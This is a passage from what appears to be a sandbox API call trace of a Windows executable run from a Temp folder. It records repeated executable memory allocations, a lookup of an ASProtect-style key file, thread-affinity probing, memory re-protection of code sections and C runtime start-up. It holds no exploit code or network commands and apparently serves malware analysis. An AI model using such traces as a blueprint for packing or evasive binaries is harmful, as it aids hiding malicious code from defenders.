(lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.019] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.019] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.021] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.022] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.024] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.025] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.033] GetSystemTime (in: lpSystemTime=0x18fef4 | out: lpSystemTime=0x18fef4*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x11, wMinute=0x34, wSecond=0x16, wMilliseconds=0x2e5)) [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.033] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.034] GetCurrentProcessId () returned 0xfb0 [0242.035] GetCurrentProcessId () returned 0xfb0 [0242.035] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.039] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] GetCurrentProcessId () returned 0xfb0 [0242.040] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.041] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] GetCurrentProcessId () returned 0xfb0 [0242.043] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.044] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.045] GetCurrentProcessId () returned 0xfb0 [0242.045] GetCurrentProcessId () returned 0xfb0 [0242.045] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] GetCurrentProcessId () returned 0xfb0 [0242.046] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.047] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] GetCurrentProcessId () returned 0xfb0 [0242.048] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.049] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.050] GetCurrentProcessId () returned 0xfb0 [0242.050] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] GetCurrentProcessId () returned 0xfb0 [0242.051] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.052] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] GetCurrentProcessId () returned 0xfb0 [0242.053] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.054] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.055] GetCurrentProcessId () returned 0xfb0 [0242.056] GetCurrentProcessId () returned 0xfb0 [0242.056] GetCurrentProcessId () returned 0xfb0 [0242.056] GetCurrentProcessId () returned 0xfb0 [0242.102] ExpandEnvironmentStringsA (in: lpSrc="aspr_keys.ini", lpDst=0x18f6a8, nSize=0x400 | out: lpDst="aspr_keys.ini") returned 0xe [0242.102] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9a8, nSize=0xff | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe")) returned 0x2d [0242.103] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x302128, ftCreationTime.dwLowDateTime=0x18fab0, ftCreationTime.dwHighDateTime=0x30214c, ftLastAccessTime.dwLowDateTime=0x302153, ftLastAccessTime.dwHighDateTime=0x2d, ftLastWriteTime.dwLowDateTime=0x18f9a8, ftLastWriteTime.dwHighDateTime=0x18fac8, nFileSizeHigh=0xa70000, nFileSizeLow=0x24792b8, dwReserved0=0x18fed8, dwReserved1=0x3025a2, cFileName="À\x92G\x02¨ù\x18", cAlternateFileName="ü\x92G\x022")) returned 0xffffffff [0242.103] GetTempPathA (in: nBufferLength=0x3ff, lpBuffer=0x18fad0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0242.103] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0xa70000, ftCreationTime.dwLowDateTime=0x20000000, ftCreationTime.dwHighDateTime=0xa87df8, ftLastAccessTime.dwLowDateTime=0x18fa50, ftLastAccessTime.dwHighDateTime=0x77a1389e, ftLastWriteTime.dwLowDateTime=0xa70138, ftLastWriteTime.dwHighDateTime=0x77a1387a, nFileSizeHigh=0x7702b497, nFileSizeLow=0x0, dwReserved0=0xa70000, dwReserved1=0xa87e00, cFileName="¼", cAlternateFileName="\x8cú\x18")) returned 0xffffffff [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.104] GetCurrentProcessId () returned 0xfb0 [0242.105] GetCurrentProcessId () returned 0xfb0 [0242.105] GetCurrentProcessId () returned 0xfb0 [0242.105] GetCurrentProcessId () returned 0xfb0 [0242.105] GetCurrentProcessId () returned 0xfb0 [0242.105] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.106] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.108] GetCurrentProcessId () returned 0xfb0 [0242.108] GetCurrentProcessId () returned 0xfb0 [0242.108] GetCurrentProcessId () returned 0xfb0 [0242.108] GetCurrentProcessId () returned 0xfb0 [0242.108] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.109] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.110] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] GetCurrentProcessId () returned 0xfb0 [0242.111] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.112] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.113] GetCurrentProcessId () returned 0xfb0 [0242.113] GetCurrentProcessId () returned 0xfb0 [0242.113] GetCurrentProcessId () returned 0xfb0 [0242.113] GetCurrentProcessId () returned 0xfb0 [0242.114] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.115] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.116] GetCurrentProcessId () returned 0xfb0 [0242.116] GetCurrentProcessId () returned 0xfb0 [0242.116] GetCurrentProcessId () returned 0xfb0 [0242.116] GetCurrentProcessId () returned 0xfb0 [0242.116] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0242.117] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] GetCurrentProcessId () returned 0xfb0 [0242.118] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.119] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.120] VirtualFree (lpAddress=0xbc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.121] VirtualFree (lpAddress=0xcb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.122] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.125] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.126] GetCurrentProcessId () returned 0xfb0 [0242.127] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.128] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.129] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.130] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.131] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.132] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.133] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.134] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.135] VirtualFree (lpAddress=0x3c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.136] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.137] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.138] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.168] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.169] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.170] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.171] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.559] LocalFree (hMem=0xa87eb8) returned 0x0 [0242.560] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18fe6c, lpSystemAffinityMask=0x18fea4 | out: lpProcessAffinityMask=0x18fe6c, lpSystemAffinityMask=0x18fea4) returned 1 [0242.561] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0242.562] Sleep (dwMilliseconds=0x0) [0242.598] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0242.599] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x2) returned 0x0 [0242.599] Sleep (dwMilliseconds=0x0) [0242.601] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0242.601] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x4) returned 0x0 [0242.602] Sleep (dwMilliseconds=0x0) [0242.603] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0242.603] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x8) returned 0x0 [0242.604] Sleep (dwMilliseconds=0x0) [0242.605] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0242.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fa80*=0x47e000, NumberOfBytesToProtect=0x18fa78, NewAccessProtection=0x20, OldAccessProtection=0x18fdc0 | out: BaseAddress=0x18fa80*=0x47e000, NumberOfBytesToProtect=0x18fa78, OldAccessProtection=0x18fdc0*=0x40) returned 0x0 [0242.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fa80*=0x46d000, NumberOfBytesToProtect=0x18fa78, NewAccessProtection=0x2, OldAccessProtection=0x18fdc0 | out: BaseAddress=0x18fa80*=0x46d000, NumberOfBytesToProtect=0x18fa78, OldAccessProtection=0x18fdc0*=0x4) returned 0x0 [0242.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fa80*=0x401000, NumberOfBytesToProtect=0x18fa78, NewAccessProtection=0x20, OldAccessProtection=0x18fdc0 | out: BaseAddress=0x18fa80*=0x401000, NumberOfBytesToProtect=0x18fa78, OldAccessProtection=0x18fdc0*=0x40) returned 0x0 [0242.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff2c | out: lpSystemTimeAsFileTime=0x18ff2c*(dwLowDateTime=0xfcbb5c60, dwHighDateTime=0x1d80713)) [0242.647] GetCurrentThreadId () returned 0xfb4 [0242.647] GetCurrentProcessId () returned 0xfb0 [0242.647] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=1200620503432) returned 1 [0242.674] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0242.729] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0242.750] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0242.750] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0242.751] GetLastError () returned 0x7e [0242.751] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0242.752] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0242.817] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0243.018] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0243.019] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0243.020] GetProcessHeap () returned 0xa70000 [0243.037] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0243.038] GetLastError () returned 0x7e [0243.038] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0243.038] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0243.039] GetLastError () returned 0x7e [0243.039] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0243.039] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0243.039] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x364) returned 0xa881d0 [0243.058] SetLastError (dwErrCode=0x7e) [0243.093] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xe00) returned 0xa88540 [0243.094] GetStartupInfoW (in: lpStartupInfo=0x18fe64 | out: lpStartupInfo=0x18fe64*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x409390, hStdOutput=0x77b30bec, hStdError=0xfffffffe)) [0243.094] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0243.094] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0243.094] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0243.111] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" [0243.111] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" [0243.183] GetACP () returned 0x4e4 [0243.183] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x220) returned 0xa87eb8 [0243.183] IsValidCodePage (CodePage=0x4e4) returned 1 [0243.183] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0243.310] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f74c | out: lpCPInfo=0x18f74c) returned 1 [0243.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x18f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.340] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f760 | out: lpCharType=0x18f760) returned 1 [0243.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x18f4a8, cchWideChar=256 | out: lpWideCharStr=" 